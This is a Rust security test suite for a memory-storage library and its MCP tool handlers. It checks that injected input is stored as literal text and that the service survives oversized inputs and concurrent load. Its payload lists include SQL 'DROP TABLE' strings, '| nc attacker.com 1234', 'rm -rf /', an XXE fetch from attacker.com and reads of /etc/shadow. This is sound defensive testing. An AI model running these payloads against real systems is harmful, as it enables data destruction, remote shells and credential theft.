use crate::common::TestDatabaseManager;
use anyhow::Result;
use codex_memory::{mcp_server::MCPHandlers, Storage};
use serde_json::json;
use std::sync::Arc;
/// Stores classic SQL-injection payloads through every free-text argument of
/// `Storage::store` (content, context and tags) and checks that each accepted
/// payload round-trips as literal text.
///
/// A payload may be rejected with an error; that is only logged. Accepted
/// payloads must be returned exactly as given. After all attempts the memory
/// count must be higher than before, and a plain store/get round-trip must
/// still work.
#[tokio::test]
async fn test_sql_injection_protection() -> Result<()> {
    let mut manager = TestDatabaseManager::new()?;
    let pool = manager.setup_test_database().await?;
    let storage = Arc::new(Storage::new(pool));
    // Very long input with a destructive statement appended at the very end.
    let buffer_overflow_attempt = "A".repeat(10000) + "'; DROP TABLE memories; --";
    let injection_payloads = vec![
        "'; DROP TABLE memories; --",
        "' OR '1'='1",
        "'; DELETE FROM memories; --",
        "' UNION SELECT * FROM memories; --",
        "admin'--",
        "' OR 1=1 --",
        "'; INSERT INTO memories VALUES ('injected'); --",
        "' OR 'x'='x",
        "'; UPDATE memories SET content='hacked' WHERE '1'='1'; --",
        "' UNION SELECT password FROM users WHERE '1'='1'; --",
        "'; TRUNCATE memories; --",
        "' OR (SELECT COUNT(*) FROM memories) > 0; --",
        "'; WAITFOR DELAY '00:00:10'; --",
        "' OR (SELECT SLEEP(5)) --",
        "' AND (SELECT SUBSTRING(version(),1,1))='5'; --",
        "' AND (SELECT COUNT(*) FROM memories) > 0; --",
        "' AND extractvalue(1, concat(0x7e, version(), 0x7e)); --",
        "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); --",
        "{'$ne': null}",
        "{'$gt': ''}",
        "'; db.memories.drop(); //",
        "test'; INSERT INTO memories (content) VALUES ('injected content'); --",
        "%27; DROP TABLE memories; --",
        "\\'; DROP TABLE memories; --",
        "\"; DROP TABLE memories; --",
        "test'+'test'; DROP TABLE memories; --",
        "CHAR(39)+CHAR(59)+DROP+TABLE+memories+CHAR(59)+CHAR(45)+CHAR(45)",
        "'; COPY memories TO '/tmp/hack.txt'; --",
        "'; CREATE FUNCTION malicious() RETURNS VOID AS $$ BEGIN RAISE NOTICE 'hacked'; END; $$ LANGUAGE plpgsql; --",
        &buffer_overflow_attempt,
    ];
    println!(
        "Testing {} SQL injection payloads...",
        injection_payloads.len()
    );
    // Baseline for the integrity checks below.
    let initial_stats = storage.stats().await?;
    let initial_memory_count = initial_stats.total_memories;
    for (i, payload) in injection_payloads.iter().enumerate() {
        println!(
            "Testing payload #{}: {}",
            i + 1,
            payload.chars().take(50).collect::<String>()
        );

        // 1) Payload as the memory content.
        let result = storage
            .store(
                payload,
                format!("Context for injection test #{}", i + 1),
                "Safe summary".to_string(),
                Some(vec!["injection-test".to_string()]),
            )
            .await;
        match result {
            Ok(id) => {
                println!(" ✅ Payload stored safely (injection blocked)");
                let retrieved = storage
                    .get(id)
                    .await?
                    .expect("Should retrieve injected content");
                assert_eq!(
                    retrieved.content, *payload,
                    "Malicious content should be stored as literal text"
                );
                let current_stats = storage.stats().await?;
                assert!(
                    current_stats.total_memories > initial_memory_count,
                    "Memory count should have increased normally"
                );
            }
            Err(e) => {
                println!(" ⚠️ Payload rejected: {}", e);
            }
        }

        // 2) Payload as the context; rejection is tolerated.
        let context_result = storage
            .store(
                &format!("Safe content for context test #{}", i + 1),
                payload.to_string(),
                "Safe summary".to_string(),
                Some(vec!["context-injection-test".to_string()]),
            )
            .await;
        if let Ok(id) = context_result {
            let retrieved = storage
                .get(id)
                .await?
                .expect("Should retrieve context injection test");
            assert_eq!(
                retrieved.context, *payload,
                "Malicious context should be stored as literal text"
            );
        }

        // 3) Payload as a tag; rejection is tolerated.
        let tag_result = storage
            .store(
                &format!("Safe content for tag test #{}", i + 1),
                "Safe context".to_string(),
                "Safe summary".to_string(),
                Some(vec![payload.to_string(), "tag-injection-test".to_string()]),
            )
            .await;
        if let Ok(id) = tag_result {
            let retrieved = storage
                .get(id)
                .await?
                .expect("Should retrieve tag injection test");
            assert!(
                retrieved.tags.contains(&payload.to_string()),
                "Malicious tag should be stored as literal text"
            );
        }
    }

    let final_stats = storage.stats().await?;
    // Assert before computing the difference. If an injection had removed rows,
    // `final - initial` could underflow (for an unsigned count type). It would then
    // panic with an opaque overflow message instead of this descriptive failure.
    assert!(
        final_stats.total_memories > initial_memory_count,
        "Database should contain new memories (injections stored safely)"
    );
    println!("Database integrity check:");
    println!(" Initial memories: {}", initial_memory_count);
    println!(" Final memories: {}", final_stats.total_memories);
    println!(
        " Memories added: {}",
        final_stats.total_memories - initial_memory_count
    );

    // The database must still serve ordinary writes and reads.
    let recovery_id = storage
        .store(
            "Post-injection recovery test",
            "Normal context".to_string(),
            "Normal summary".to_string(),
            Some(vec!["recovery".to_string()]),
        )
        .await?;
    let recovery_content = storage
        .get(recovery_id)
        .await?
        .expect("Should retrieve recovery content");
    assert_eq!(recovery_content.content, "Post-injection recovery test");
    println!("✅ All SQL injection tests passed - database remains secure");
    manager.cleanup().await?;
    Ok(())
}
/// Sends hostile strings through the MCP `store_memory` tool as content,
/// context and tag values. The payloads cover:
/// - JSON-breaking quotes and escapes, and embedded SQL;
/// - control characters;
/// - markup/script snippets;
/// - path traversal and shell metacharacters;
/// - format specifiers and very long strings.
///
/// Any payload may be rejected; rejections are only logged. When a content
/// payload is accepted and the response carries an `id` string, the stored
/// memory must hold the payload verbatim. Afterwards the handler must still
/// accept a normal request, and the memory count must not have dropped below
/// its starting value.
#[tokio::test]
async fn test_mcp_json_injection_protection() -> Result<()> {
    let mut manager = TestDatabaseManager::new()?;
    let pool = manager.setup_test_database().await?;
    let storage = Arc::new(Storage::new(pool));
    let handlers = MCPHandlers::new(storage.clone());
    let large_json_payload = "A".repeat(100000) + r#"","malicious":"payload"#;
    let overflow_attempt1 = "A".repeat(65536);
    let overflow_attempt2 = "\x7F".repeat(1000);
    let json_injection_payloads = vec![
        r#"{"malicious": "value"}, {"content": "injected"#,
        r#"content"; DROP TABLE memories; --"#,
        r#"\"; DROP TABLE memories; --"#,
        r#"test\","malicious":"value"#,
        r#"test\n\r\t\","evil":"payload"#,
        r#"test\u0022,\u0022malicious\u0022:\u0022value\u0022"#,
        r#"test\u0027; DROP TABLE memories; --"#,
        "test\x00\x01\x02\x03",
        "test\n\r\t\0",
        &large_json_payload,
        r#"{"nested": {"malicious": "DROP TABLE memories"}}"#,
        r#"[{"injection": "attempt"}]"#,
        r#"<script>alert('xss')</script>"#,
        r#"javascript:alert('xss')"#,
        r#"onload=alert('xss')"#,
        r#"../../../etc/passwd"#,
        r#"..\..\..\..\windows\system32\config\sam"#,
        r#"; rm -rf /; --"#,
        r#"| nc attacker.com 1234"#,
        r#"& ping attacker.com"#,
        r#"%s%s%s%s%s%s%s%s"#,
        r#"%x%x%x%x%x%x%x%x"#,
        &overflow_attempt1,
        &overflow_attempt2,
    ];
    println!(
        "Testing {} JSON injection payloads through MCP...",
        json_injection_payloads.len()
    );
    // Baseline used at the end to detect rows removed by a successful injection.
    let initial_stats = storage.stats().await?;
    for (i, payload) in json_injection_payloads.iter().enumerate() {
        println!(
            "Testing JSON payload #{}: {}",
            i + 1,
            payload.chars().take(50).collect::<String>().escape_debug()
        );

        // 1) Payload as content: verify the round-trip when an id is returned.
        let params = json!({
            "content": payload,
            "context": format!("Context with potential injection #{}", i + 1),
            "summary": "Safe summary",
            "tags": [format!("json-injection-{}", i + 1)]
        });
        let result = handlers.handle_tool_call("store_memory", params).await;
        match result {
            Ok(response) => {
                println!(" ✅ Payload handled safely");
                if let Some(id) = response["id"].as_str() {
                    let retrieved = storage
                        .get(uuid::Uuid::parse_str(id)?)
                        .await?
                        .expect("Should retrieve injected content");
                    assert_eq!(
                        retrieved.content, *payload,
                        "Malicious payload should be stored as literal content"
                    );
                    assert_eq!(
                        retrieved.context,
                        format!("Context with potential injection #{}", i + 1)
                    );
                }
            }
            Err(e) => {
                println!(" ⚠️ Payload rejected: {}", e);
            }
        }

        // 2) Payload as context. Rejection is acceptable but is now reported
        //    instead of being silently discarded.
        let context_injection_params = json!({
            "content": format!("Safe content #{}", i + 1),
            "context": payload,
            "summary": "Safe summary for context injection test",
            "tags": ["context-injection"]
        });
        if let Err(e) = handlers
            .handle_tool_call("store_memory", context_injection_params)
            .await
        {
            println!(" ⚠️ Context payload rejected: {}", e);
        }

        // 3) Payload as a tag; same best-effort treatment.
        let tag_injection_params = json!({
            "content": format!("Safe content for tag injection #{}", i + 1),
            "context": "Safe context for tag injection test",
            "summary": "Safe summary for tag injection test",
            "tags": [payload, "tag-injection"]
        });
        if let Err(e) = handlers
            .handle_tool_call("store_memory", tag_injection_params)
            .await
        {
            println!(" ⚠️ Tag payload rejected: {}", e);
        }
    }

    let recovery_params = json!({
        "content": "MCP recovery test after injection attempts",
        "context": "Normal context",
        "summary": "Normal summary",
        "tags": ["recovery", "mcp"]
    });
    let recovery_result = handlers
        .handle_tool_call("store_memory", recovery_params)
        .await;
    assert!(
        recovery_result.is_ok(),
        "MCP handlers should remain functional after injection tests"
    );

    // A destructive injection (DELETE/TRUNCATE/...) that actually executed would
    // leave fewer rows than we started with.
    let final_stats = storage.stats().await?;
    assert!(
        final_stats.total_memories >= initial_stats.total_memories,
        "No memories should be lost to JSON injection attempts"
    );
    println!("✅ All JSON injection tests passed - MCP interface remains secure");
    manager.cleanup().await?;
    Ok(())
}
/// Probes the MCP `store_memory` tool with oversized and wrongly-typed
/// arguments.
///
/// Oversized inputs may be accepted, rejected or time out (30 s budget). Each
/// outcome is only logged, but the handler must serve a normal request right
/// afterwards. Wrongly-typed inputs may be accepted. When one is rejected,
/// the lower-cased error text must mention "missing", "invalid", "type" or
/// "parameter".
#[tokio::test]
async fn test_parameter_validation_security() -> Result<()> {
    let mut manager = TestDatabaseManager::new()?;
    let pool = manager.setup_test_database().await?;
    let storage = Arc::new(Storage::new(pool));
    let handlers = MCPHandlers::new(storage.clone());
    println!("Testing parameter validation security...");

    // --- Oversized arguments -------------------------------------------------
    let many_tags: Vec<String> = (0..100000).map(|n| format!("tag{}", n)).collect();
    let oversized_cases = vec![
        (
            "huge_content",
            json!({
                "content": "A".repeat(50_000_000),
                "context": "Test context",
                "summary": "Test summary"
            }),
        ),
        (
            "huge_context",
            json!({
                "content": "Normal content",
                "context": "B".repeat(10_000_000),
                "summary": "Test summary"
            }),
        ),
        (
            "huge_summary",
            json!({
                "content": "Normal content",
                "context": "Test context",
                "summary": "C".repeat(5_000_000)
            }),
        ),
        (
            "huge_tag_array",
            json!({
                "content": "Normal content",
                "context": "Test context",
                "summary": "Test summary",
                "tags": many_tags
            }),
        ),
        (
            "huge_tag_names",
            json!({
                "content": "Normal content",
                "context": "Test context",
                "summary": "Test summary",
                "tags": vec!["D".repeat(1_000_000)]
            }),
        ),
    ];
    for (label, payload) in oversized_cases {
        println!("Testing oversized parameter: {}", label);
        let started = std::time::Instant::now();
        let outcome = tokio::time::timeout(
            std::time::Duration::from_secs(30),
            handlers.handle_tool_call("store_memory", payload),
        )
        .await;
        let elapsed = started.elapsed();
        match outcome {
            Err(_) => {
                println!(" ✅ {} timed out (DoS protection working)", label);
            }
            Ok(Err(err)) => {
                println!(" ✅ {} rejected: {}", label, err);
                println!(" Rejection reason: {}", err.to_string().to_lowercase());
            }
            Ok(Ok(_)) => {
                println!(" ⚠️ {} was accepted (potential DoS risk)", label);
                println!(" Processing time: {:?}", elapsed);
            }
        }

        // Whatever happened above, an ordinary request must still go through.
        let still_healthy = handlers
            .handle_tool_call(
                "store_memory",
                json!({
                    "content": format!("Recovery after {} test", label),
                    "context": "Test recovery context",
                    "summary": "Test recovery summary",
                    "tags": ["recovery"]
                }),
            )
            .await
            .is_ok();
        assert!(
            still_healthy,
            "System should remain responsive after oversized parameter test"
        );
    }

    // --- Wrongly-typed arguments ---------------------------------------------
    let malformed_cases = vec![
        ("null_content", json!({"content": null})),
        ("array_content", json!({"content": ["not", "a", "string"]})),
        ("object_content", json!({"content": {"not": "a string"}})),
        ("number_content", json!({"content": 123456})),
        ("boolean_content", json!({"content": true})),
        ("number_context", json!({"content": "test", "context": 123})),
        (
            "array_summary",
            json!({"content": "test", "summary": ["not", "string"]}),
        ),
        (
            "string_tags",
            json!({"content": "test", "tags": "not an array"}),
        ),
        (
            "mixed_type_tags",
            json!({"content": "test", "tags": [123, true, null, {"object": "tag"}]}),
        ),
    ];
    let validation_keywords = ["missing", "invalid", "type", "parameter"];
    for (label, payload) in malformed_cases {
        println!("Testing malformed parameter: {}", label);
        match handlers.handle_tool_call("store_memory", payload).await {
            Ok(_) => println!(" ⚠️ {} was accepted (type coercion occurred)", label),
            Err(err) => {
                println!(" ✅ {} rejected: {}", label, err);
                let lowered = err.to_string().to_lowercase();
                let mentions_validation = validation_keywords
                    .iter()
                    .any(|keyword| lowered.contains(*keyword));
                assert!(mentions_validation, "Error should describe validation issue");
            }
        }
    }

    println!("✅ Parameter validation security tests completed");
    manager.cleanup().await?;
    Ok(())
}
/// Round-trips hostile but non-SQL strings through `Storage::store` /
/// `Storage::get`. The samples cover:
/// - control characters, including NUL;
/// - printf-style format specifiers and shell metacharacters;
/// - script and URI-scheme snippets;
/// - LDAP-filter-style fragments and an XML DOCTYPE with an external entity;
/// - path-traversal strings;
/// - bidi and zero-width characters, a long emoji run and look-alike domains.
///
/// Rejection is allowed and only logged. Anything accepted must come back
/// byte-for-byte. A normal store/get round-trip must still work afterwards.
#[tokio::test]
async fn test_content_sanitization_security() -> Result<()> {
    let mut manager = TestDatabaseManager::new()?;
    let pool = manager.setup_test_database().await?;
    let storage = Arc::new(Storage::new(pool));
    let emoji_spam = "\u{1F600}".repeat(10000);
    let dangerous_content = vec![
        "\x00\x01\x02\x03\x7F\x7E\x7D\x7C",
        "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F",
        "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F",
        "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",
        "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x",
        "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n",
        "; rm -rf / #",
        "| nc attacker.com 1234",
        "& ping evil.com",
        "`whoami`",
        "$(id)",
        "${HOME}",
        "<script>alert('xss')</script>",
        "javascript:alert('xss')",
        "data:text/html,<script>alert('xss')</script>",
        "vbscript:msgbox('xss')",
        "*)(uid=*",
        "*)(|(mail=*",
        "*)(&(password=*",
        "<?xml version='1.0'?><!DOCTYPE root [<!ENTITY % remote SYSTEM 'http://attacker.com/evil.dtd'>%remote;]>",
        "../../../etc/passwd",
        "..\\..\\..\\windows\\system32\\config\\sam",
        "/etc/shadow",
        "C:\\Windows\\System32\\drivers\\etc\\hosts",
        "innocent.txt\x00.evil",
        "safe\x00malicious",
        "\u{202E}\u{0644}\u{0645}\u{0646}\u{202D}",
        "\u{FEFF}",
        "\u{200B}\u{200C}\u{200D}",
        &emoji_spam,
        "раураl.com",
        "аррӏе.com",
    ];
    let sample_count = dangerous_content.len();
    println!("Testing {} dangerous content samples...", sample_count);

    for (idx, sample) in dangerous_content.iter().enumerate() {
        let ordinal = idx + 1;
        // Escaped and truncated so control characters don't garble the log.
        let escaped = sample.escape_debug().to_string();
        let preview: String = escaped.chars().take(50).collect();
        println!("Testing dangerous content #{}: {}", ordinal, preview);

        let stored = storage
            .store(
                sample,
                format!("Context for dangerous content #{}", ordinal),
                "Safe summary".to_string(),
                Some(vec!["dangerous-content".to_string()]),
            )
            .await;
        let id = match stored {
            Err(e) => {
                println!(" ⚠️ Dangerous content rejected: {}", e);
                continue;
            }
            Ok(id) => id,
        };

        println!(" ✅ Dangerous content stored safely");
        let fetched = storage
            .get(id)
            .await?
            .expect("Should retrieve dangerous content");
        assert_eq!(
            fetched.content.as_bytes(),
            sample.as_bytes(),
            "Dangerous content should be stored exactly as provided"
        );
        println!(" ✅ Content retrieved exactly as stored (not interpreted)");
    }

    let total_after = storage.stats().await?.total_memories;
    println!("Database stats after dangerous content tests:");
    println!(" Total memories: {}", total_after);

    // Ordinary content must still round-trip after the hostile samples.
    let expected_text = "Safe content after dangerous content tests";
    let safe_id = storage
        .store(
            expected_text,
            "Normal context".to_string(),
            "Normal summary".to_string(),
            Some(vec!["safe".to_string()]),
        )
        .await?;
    let round_tripped = storage
        .get(safe_id)
        .await?
        .expect("Should retrieve safe content");
    assert_eq!(round_tripped.content, expected_text);

    println!("✅ Content sanitization security tests passed");
    manager.cleanup().await?;
    Ok(())
}
/// Applies three kinds of load to the MCP/storage layer and checks that it
/// degrades gracefully:
///
/// 1. 200 concurrently spawned `store_memory` calls. At least one must
///    succeed; many failures or timeouts are reported as rate limiting.
/// 2. Single payloads of 1, 5, 10 and 50 MB, each with a 60 s budget. Any
///    outcome is logged, but a small follow-up request must succeed.
/// 3. 100 concurrently spawned direct `Storage::store` calls. More than 70%
///    must succeed.
///
/// A panicking task is not counted as an ordinary failure. It fails the test,
/// because a panic under load is itself a denial-of-service bug. Tasks still
/// running after their 30 s wait are aborted rather than detached, so they
/// cannot keep writing to the database during later phases or cleanup.
#[tokio::test]
async fn test_resource_exhaustion_attacks() -> Result<()> {
    let mut manager = TestDatabaseManager::new()?;
    let pool = manager.setup_test_database().await?;
    let storage = Arc::new(Storage::new(pool));
    let handlers = Arc::new(MCPHandlers::new(storage.clone()));
    println!("Testing resource exhaustion attack protection...");

    // --- Phase 1: rapid-fire concurrent requests -----------------------------
    println!("Testing rapid fire request protection...");
    let rapid_fire_count = 200;
    let mut handles = vec![];
    let start = std::time::Instant::now();
    for i in 0..rapid_fire_count {
        let handlers_clone = handlers.clone();
        let handle = tokio::spawn(async move {
            let params = json!({
                "content": format!("Rapid fire test {}", i),
                "context": format!("Rapid fire test context {}", i),
                "summary": format!("Rapid fire test summary {}", i),
                "tags": ["rapid-fire", "dos-test"]
            });
            handlers_clone
                .handle_tool_call("store_memory", params)
                .await
        });
        handles.push(handle);
    }
    let mut successes = 0;
    let mut failures = 0;
    let mut timeouts = 0;
    let mut panics = 0;
    for mut handle in handles {
        // Await through `&mut` so we still own the handle on timeout and can
        // abort the straggler. Dropping a JoinHandle would merely detach it.
        match tokio::time::timeout(std::time::Duration::from_secs(30), &mut handle).await {
            Ok(Ok(Ok(_))) => successes += 1,
            Ok(Ok(Err(_))) => failures += 1,
            Ok(Err(join_err)) if join_err.is_panic() => panics += 1,
            Ok(Err(_)) => failures += 1,
            Err(_) => {
                handle.abort();
                timeouts += 1;
            }
        }
    }
    let duration = start.elapsed();
    let rate_limit_triggered =
        failures > (rapid_fire_count / 2) || timeouts > (rapid_fire_count / 4);
    println!("Rapid fire results:");
    println!(" Duration: {:?}", duration);
    println!(" Successes: {}", successes);
    println!(" Failures: {}", failures);
    println!(" Timeouts: {}", timeouts);
    println!(" Panics: {}", panics);
    println!(" Rate limiting triggered: {}", rate_limit_triggered);
    assert_eq!(
        panics, 0,
        "Request handlers must not panic under rapid-fire load"
    );
    assert!(successes > 0, "Some requests should succeed");
    if rate_limit_triggered {
        println!(" ✅ Rate limiting protection working");
    } else {
        println!(" ✅ System handled rapid requests without rate limiting");
    }

    // --- Phase 2: very large single payloads ---------------------------------
    println!("Testing memory exhaustion protection...");
    let memory_bomb_sizes = vec![1_000_000, 5_000_000, 10_000_000, 50_000_000];
    for size in memory_bomb_sizes {
        println!(" Testing {}MB payload...", size / 1_000_000);
        let large_content = "X".repeat(size);
        let start = std::time::Instant::now();
        let result = tokio::time::timeout(
            std::time::Duration::from_secs(60),
            handlers.handle_tool_call(
                "store_memory",
                json!({
                    "content": large_content,
                    "context": "Memory bomb test context",
                    "summary": "Memory bomb test summary",
                    "tags": ["memory-bomb"]
                }),
            ),
        )
        .await;
        let duration = start.elapsed();
        match result {
            Ok(Ok(_)) => {
                println!(
                    " ⚠️ {}MB payload accepted (potential memory risk)",
                    size / 1_000_000
                );
                println!(" Processing time: {:?}", duration);
            }
            Ok(Err(e)) => {
                println!(" ✅ {}MB payload rejected: {}", size / 1_000_000, e);
            }
            Err(_) => {
                println!(
                    " ✅ {}MB payload timed out (protection working)",
                    size / 1_000_000
                );
            }
        }
        // The handler must still accept a normal request after each attempt.
        let health_check = handlers
            .handle_tool_call(
                "store_memory",
                json!({
                    "content": format!("Health check after {}MB test", size / 1_000_000),
                    "context": "Health check context",
                    "summary": "Health check summary",
                    "tags": ["health-check"]
                }),
            )
            .await;
        assert!(
            health_check.is_ok(),
            "System should remain responsive after large payload test"
        );
    }

    // --- Phase 3: many concurrent direct storage writes ----------------------
    println!("Testing connection exhaustion protection...");
    let connection_bomb_count = 100;
    let mut connection_handles = vec![];
    for i in 0..connection_bomb_count {
        let storage_clone = storage.clone();
        let handle = tokio::spawn(async move {
            // Short delay so the writes start together, after all tasks are spawned.
            tokio::time::sleep(std::time::Duration::from_millis(100)).await;
            storage_clone
                .store(
                    &format!("Connection bomb test {}", i),
                    "Test context".to_string(),
                    "Test summary".to_string(),
                    None,
                )
                .await
        });
        connection_handles.push(handle);
    }
    let mut connection_successes = 0;
    let mut connection_failures = 0;
    let mut connection_panics = 0;
    for mut handle in connection_handles {
        match tokio::time::timeout(std::time::Duration::from_secs(30), &mut handle).await {
            Ok(Ok(Ok(_))) => connection_successes += 1,
            Ok(Ok(Err(_))) => connection_failures += 1,
            Ok(Err(join_err)) if join_err.is_panic() => connection_panics += 1,
            Ok(Err(_)) => connection_failures += 1,
            Err(_) => {
                handle.abort();
                connection_failures += 1;
            }
        }
    }
    println!("Connection exhaustion results:");
    println!(" Successes: {}", connection_successes);
    println!(" Failures: {}", connection_failures);
    println!(" Panics: {}", connection_panics);
    assert_eq!(
        connection_panics, 0,
        "Storage writes must not panic under concurrent load"
    );
    assert!(
        connection_successes > (connection_bomb_count * 70 / 100),
        "Should handle reasonable connection load"
    );
    println!("✅ Resource exhaustion attack protection tests completed");
    manager.cleanup().await?;
    Ok(())
}